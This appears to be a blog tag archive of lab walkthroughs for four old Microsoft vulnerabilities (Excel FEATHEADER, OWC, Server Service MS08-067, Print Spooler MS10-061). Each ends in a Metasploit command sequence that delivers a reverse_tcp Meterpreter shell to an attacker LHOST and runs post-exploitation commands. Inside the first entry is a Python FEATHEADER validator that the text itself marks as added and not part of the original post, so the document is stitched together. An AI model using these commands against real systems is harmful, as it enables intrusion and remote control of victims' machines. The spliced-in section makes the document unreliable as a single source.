Tag Archives: Microsoft

MS09-067 : Microsoft Excel Malformed FEATHEADER Record Vulnerability

Timeline :

Vulnerability reported to Microsoft by ZDI on 2009-10-20
Microsoft patch “KB973475” provided on 2009-11-10
Metasploit PoC provided by hdm on 2010-02-12
Exploit-DB PoC provided by anonymous on 2010-08-21

PoC provided by :

Sean Larsson
jduck

Reference(s) :

CVE-2009-3129
MS09-067

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
2007 Microsoft Office System SP1 & SP2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office Excel Viewer SP1 & SP2
Microsoft Office Excel Viewer 2003 SP3

Tested on Windows XP SP3 with :

Office Excel 2003 SP3 before KB973475

Description :

This module exploits a vulnerability in the handling of the FEATHEADER record by Microsoft Excel. Revisions of Office XP and later prior to the release of the MS09-067 bulletin are vulnerable. When processing a FEATHEADER (Shared Feature) record, Microsoft used a data structure from the file to calculate a pointer offset without doing proper validation. Attacker supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code execution. NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing.
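As an added defender-side illustration (not part of the original post or of the Metasploit module), the following Python walks a raw BIFF8 record stream and applies the validation the description says Excel lacked: the FeatHdr record's size field must stay inside the record that carries it. It assumes the Workbook stream has already been extracted from the OLE2 container and uses the FeatHdr layout from MS-XLS; the sample records are constructed inline.

```python
import struct

FEATHEADER = 0x0867        # BIFF8 record type of FeatHdr (MS-XLS 2.4.112)
FEATHDR_FIXED = 11         # rt(2) + grbitFrt(2) + isf(2) + reserved(1) + cbHdrData(4)
KNOWN_ISF = {2, 3, 4}      # ISFPROTECTION, ISFFEC2, ISFFACTOID
NO_HDR_DATA = 0xFFFFFFFF   # cbHdrData value meaning "rgbHdrData is empty"

def iter_records(stream):
    """Yield (record_type, body, offset) for every record in a raw BIFF stream."""
    pos = 0
    while pos + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, pos)
        end = pos + 4 + rlen
        if end > len(stream):
            raise ValueError(f"record {rtype:#06x} at {pos} runs past end of stream")
        yield rtype, stream[pos + 4:end], pos
        pos = end

def check_featheader(body):
    """Return the list of consistency problems found in one FeatHdr record body."""
    if len(body) < FEATHDR_FIXED:
        return ["record shorter than the fixed FeatHdr header"]
    rt, _grbit, isf, _reserved, cb_hdr = struct.unpack_from("<HHHBI", body, 0)
    problems = []
    if rt != FEATHEADER:
        problems.append(f"frtHeaderOld.rt is {rt:#06x}, expected 0x0867")
    if isf not in KNOWN_ISF:
        problems.append(f"unknown SharedFeatureType isf={isf:#06x}")
    left = len(body) - FEATHDR_FIXED
    # The check the vulnerable code skipped: a size taken from the file must
    # not claim more bytes than the record actually carries.
    if cb_hdr != NO_HDR_DATA and cb_hdr > left:
        problems.append(f"cbHdrData={cb_hdr:#x} exceeds the {left} bytes left in record")
    return problems

def scan_biff(stream):
    """Return [(offset, problem)] for every malformed FeatHdr record in the stream."""
    return [(off, p) for rtype, body, off in iter_records(stream)
            if rtype == FEATHEADER for p in check_featheader(body)]

def featheader_record(isf, cb_hdr, hdr_data=b""):
    """Build one FeatHdr record (constructed sample data, not from a real file)."""
    body = struct.pack("<HHHBI", FEATHEADER, 0, isf, 0xFF, cb_hdr) + hdr_data
    return struct.pack("<HH", FEATHEADER, len(body)) + body

BOF = struct.pack("<HH", 0x0809, 16) + bytes(16)   # placeholder BOF record (constructed)
EOF = struct.pack("<HH", 0x000A, 0)
CLEAN_STREAM = BOF + featheader_record(3, NO_HDR_DATA) + EOF
BAD_STREAM = BOF + featheader_record(3, 0x00401000) + EOF   # size far beyond the record
```

`scan_biff` raises on a record that runs past the end of the stream, so a truncated or padded file is reported rather than silently skipped.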

Commands :

use exploit/windows/fileformat/ms09_067_excel_featheader
set OUTPUTPATH /home/eromang
set TARGET 2
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

MS09-043 : Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption

Timeline :

Vulnerability reported to Microsoft by ZDI on 2007-03-19
Metasploit PoC provided by hdm on 2009-07-13
Milw0rm PoC provided by anonymous on 2009-07-16
Microsoft patch “KB947319” provided on 2009-08-11

PoC provided by :

unknown
hdm
Ahmed Obied
DSR

Reference(s) :

CVE-2009-1136
MS09-043

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2000 Web Components SP3
Microsoft Office XP Web Components SP3
Microsoft Office 2003 Web Components SP3
Microsoft Office 2003 Web Components SP1 for the 2007 Microsoft Office System
Microsoft Internet Security and Acceleration Server 2004 Standard Edition SP3
Microsoft Internet Security and Acceleration Server 2004 Enterprise Edition SP3
Microsoft Internet Security and Acceleration Server 2006 Standard Edition SP1
Microsoft Internet Security and Acceleration Server 2006 Enterprise Edition SP1
Microsoft BizTalk Server 2002
Microsoft Visual Studio .NET 2003 SP1
Microsoft Office Small Business Accounting 2006

Tested on Windows XP SP3 with :

Office 2003 SP3 before KB947319

Description :

This module exploits a memory corruption vulnerability within versions 10 and 11 of the Office Web Component Spreadsheet ActiveX control. This module was based on an exploit found in the wild.

Commands :

use exploit/windows/browser/ms09_043_owc_msdso
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS08-067 : Microsoft Server Service Relative Path Stack Corruption

Timeline :

Milw0rm PoC provided by Stephen Lawler on 2008-10-23
Metasploit PoC provided by hdm on 2009-10-28
Microsoft patch “KB958644” provided on 2008-10-23

PoC provided by :

Brett Moore
hdm

Reference(s) :

CVE-2008-4250
MS08-067

Affected version(s) :

Microsoft Windows 2000 SP4
Windows XP SP2 & SP3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP1 & SP2
Windows Server 2003 x64 Edition
Windows Server 2003 x64 Edition SP2
Windows Vista and Windows Vista SP1
Windows Vista x64 Edition and Windows Vista x64 Edition SP1
Windows Server 2008 for 32-bit Systems
Windows Server 2008 for x64-based Systems

Tested on Windows XP SP3 before KB958644

Description :

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module; full support for NX bypass on 2003, along with other platforms, is still in development.

Commands :

nmap 192.168.178.41
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-061 : Microsoft Print Spooler Service Impersonation Vulnerability

Timeline :

Vulnerability exploited by the StuxNet worm
Security update released by Microsoft (KB2347290) on 2010-09-14
Metasploit PoC released on 2010-09-17

PoC provided by :

jduck
hdm

Reference(s) :

CVE-2010-2729
MS10-061

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32-bit and Windows Server 2008 32-bit SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Windows 7 32-bit
Windows 7 x64
Windows Server 2008 R2 x64

Tested on Windows XP SP3

Description :

This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes an EXE and then (ab)uses the impersonation vulnerability a second time to create a secondary RPC connection to the \PIPE\ATSVC named pipe. We then proceed to create a remote AT job using a blind NetrJobAdd RPC call.

Commands :

use exploit/windows/smb/ms10_061_spoolss
nmap 192.168.178.41
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig